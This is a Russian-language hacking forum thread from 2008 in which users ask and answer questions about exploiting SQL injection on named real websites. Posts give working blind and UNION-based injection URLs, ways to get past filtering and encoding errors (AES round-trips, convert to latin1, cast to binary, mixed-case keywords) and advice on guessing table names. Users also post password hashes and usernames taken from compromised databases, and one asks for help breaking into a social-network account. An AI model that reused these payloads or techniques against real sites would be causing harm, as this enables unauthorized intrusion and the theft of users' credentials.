Ваши вопросы по уязвимостям.

Discussion in 'Уязвимости' started by darky, 4 Aug 2007.

Thread Status:
Not open for further replies.
  1. it's my

    it's my Banned

    Joined:
    29 Sep 2007
    Messages:
    335
    Likes Received:
    347
    Reputations:
    36
    Там нет ошибки.
    Ты не правильно проводишь скул, нужно в конце закрывать запрос, либо /* либо --
     
    1 person likes this.
  2. Basurman

    Basurman Elder - Старейшина

    Joined:
    10 Nov 2006
    Messages:
    363
    Likes Received:
    271
    Reputations:
    29
    Это слепая инъекция

    http://lokomotiv.yar.ru/media.aspx?media_act=show&tour_id=67&media_id=2140+and+1=1
    http://lokomotiv.yar.ru/media.aspx?media_act=show&tour_id=67&media_id=2140+and+1=0

    MSSQL
     
    #1002 Basurman, 21 Feb 2008
    Last edited: 21 Feb 2008
    1 person likes this.
  3. Климент_Ворошилов

    Joined:
    8 Dec 2007
    Messages:
    21
    Likes Received:
    10
    Reputations:
    0
    Мерси, в догонку тогда вопрос, стандартные методы раскрутки такой инъекции есть? Или наугад "как ночью по тайге"?
     
  4. sfinxs

    sfinxs New Member

    Joined:
    20 Feb 2008
    Messages:
    15
    Likes Received:
    1
    Reputations:
    0
    Привет всем из далекой Литвы . Тут есть один сайт типа "друзья моих друзэй и.т.д" http://www.one.lt который что то трудновато взломать тут. Мне очень надо вернуть свой пасс . ник sfinxs15 . Ето сайт по моему полностью с куками управляется но что то тут никакой брутус непашет . Прошу помоши у всех кто как то смог бы его взломать :) если чe pishite . http://www.one.lt
     
  5. banned

    banned Banned

    Joined:
    20 Nov 2006
    Messages:
    3,324
    Likes Received:
    1,193
    Reputations:
    252
    sfinxs, если хочешь чтобы помогли, то не ври!
    Там есть восстановление пароля
     
  6. CaNNabi$

    CaNNabi$ Elder - Старейшина

    Joined:
    21 Jan 2008
    Messages:
    62
    Likes Received:
    110
    Reputations:
    0
    Вопрос опять по SQL =)
    Вот есть SQL Инекция
    Code:
    http://www.petrovacnamoru.net/petrovac/kafe-barovi/?id=0x3127%20union+select+1,2,3,4/*
    Ну например ввожу я там version() и вместо того чтобы показать версию он мне в ответ вот что:
    Что это означает?)
     
    1 person likes this.
  7. Kakoytoxaker

    Kakoytoxaker Elder - Старейшина

    Joined:
    18 Feb 2008
    Messages:
    1,038
    Likes Received:
    1,139
    Reputations:
    350
    2 CaNNabi$
    нужно обойти фильтрацию держи:
    _http://www.petrovacnamoru.net/petrovac/kafe-barovi/?id=0x3127%20union+select+1,aes_decrypt(aes_encrypt(version(),0x71),0x71),3,4/*
     
    2 people like this.
  8. Spyder

    Spyder Elder - Старейшина

    Joined:
    9 Oct 2006
    Messages:
    1,388
    Likes Received:
    1,209
    Reputations:
    475
    jokester, лол, это по твойму филтьрация?
    Что за люди, если не знаешь нахуя писать всякую еботу?
     
    1 person likes this.
  9. Kakoytoxaker

    Kakoytoxaker Elder - Старейшина

    Joined:
    18 Feb 2008
    Messages:
    1,038
    Likes Received:
    1,139
    Reputations:
    350
    2 Spyder
    Извиняюсь за неточность обход ошибок кодировки
    Функции AES_ENCRYPT() и AES_DECRYPT()- позволяют шифровать/дешифровать данные
    Сначала шифруем с заданным ключом потом расшифровываем.Результат выводится уже в правильной кодировке. так лучше?
     
  10. m0use

    m0use Elder - Старейшина

    Joined:
    22 Feb 2006
    Messages:
    55
    Likes Received:
    8
    Reputations:
    0
    нашел один сай sql... из mysql.user version() - 4.1.20
    достал логины и шеши
    bla:*7E031FB695D422377447A5660A3B95FED283B260
    bla:*7CDBD368F59FA498366CBEC09B7A5C2BAF06D045
    потом пошли
    bla:3bb4472d333b8afa
    ......
    потом снова такого вида
    bla:*7E031FB695D422355967A5660A3B95FED283B260
    что это все значит
     
  11. Piflit

    Piflit Banned

    Joined:
    11 Aug 2006
    Messages:
    1,249
    Likes Received:
    585
    Reputations:
    31
    jokester нет. нахрена шифровать/дешифровать, если можно юзать нужную кодировку convert(version()+using+latin1)
     
  12. Spyder

    Spyder Elder - Старейшина

    Joined:
    9 Oct 2006
    Messages:
    1,388
    Likes Received:
    1,209
    Reputations:
    475
    вообще можно представить вывод функции в бинарном виде с помощьюфункции cast()
    так намного проще
    cast(version()+as+binary)
     
  13. sasTO

    sasTO Banned

    Joined:
    2 Aug 2007
    Messages:
    205
    Likes Received:
    230
    Reputations:
    14
    У меня такой вопрос,возможно ли провести sql инъекцию в сайтах бла.jino-net.ru, или нет? Спрашиваю потому что нираз не удавалось,в чем там загвоздка?
     
    #1013 sasTO, 22 Feb 2008
    Last edited: 22 Feb 2008
  14. none222

    none222 Guest

    Reputations:
    0
    да, конечно возможно
     
  15. sasTO

    sasTO Banned

    Joined:
    2 Aug 2007
    Messages:
    205
    Likes Received:
    230
    Reputations:
    14
    есть рабочий пример? Дай глянуть
     
  16. Piflit

    Piflit Banned

    Joined:
    11 Aug 2006
    Messages:
    1,249
    Likes Received:
    585
    Reputations:
    31
    там все обычно. на каждом сайте выделяется одна бд под нужды юзера. соответственно, если на сайте есть уязвимые скрипты, можно провести инъекцию в эту бд.
     
    1 person likes this.
  17. sasTO

    sasTO Banned

    Joined:
    2 Aug 2007
    Messages:
    205
    Likes Received:
    230
    Reputations:
    14
    Я понял,но хня заключается в том что кроме версии,юзера и бд,нифига не выходит,хотя версия муси 5 information_schema не пашет,мож там фильтрация стоит какая, как на хостинге спайсвеб на from?
     
    #1017 sasTO, 22 Feb 2008
    Last edited: 22 Feb 2008
  18. banned

    banned Banned

    Joined:
    20 Nov 2006
    Messages:
    3,324
    Likes Received:
    1,193
    Reputations:
    252
    fobofob, подбирай таблицы вручную
     
  19. none222

    none222 Guest

    Reputations:
    0
    Конечно не пашет! там не вильтрация, а ограничение прав. Те ж сказали, что даётся 1 БД на сайт. Значит всё просто, только столбцы нужно подобрать. А чтобы узнать имя БД - зарегай се аккаунт и посмотри. Вобщем проанализируй там всё.

    а фильтрации часто можно обходить так. Например, если слово from, то FrOm frFROMom. Но на джино нет фильтрации

    P.S. В разделе XSS я выладивал как активную, так и пассиивную.
     
    #1019 none222, 22 Feb 2008
    Last edited by a moderator: 22 Feb 2008
    1 person likes this.
  20. sasTO

    sasTO Banned

    Joined:
    2 Aug 2007
    Messages:
    205
    Likes Received:
    230
    Reputations:
    14
    и еще вопросик, что это за кодировка паролей :
    art:=Ы#џlu/њ$ )
    volov:FШ
    bazin:VШЦб(¦
    rozonova:NЕоА
    gaponov:VМВ/юШ
    malvina:з[^
    anna:eЛдIн > (· ? что это не хеши я знаю,так как на другом сайте с этим движком пароли в открытом виде
     
Thread Status:
Not open for further replies.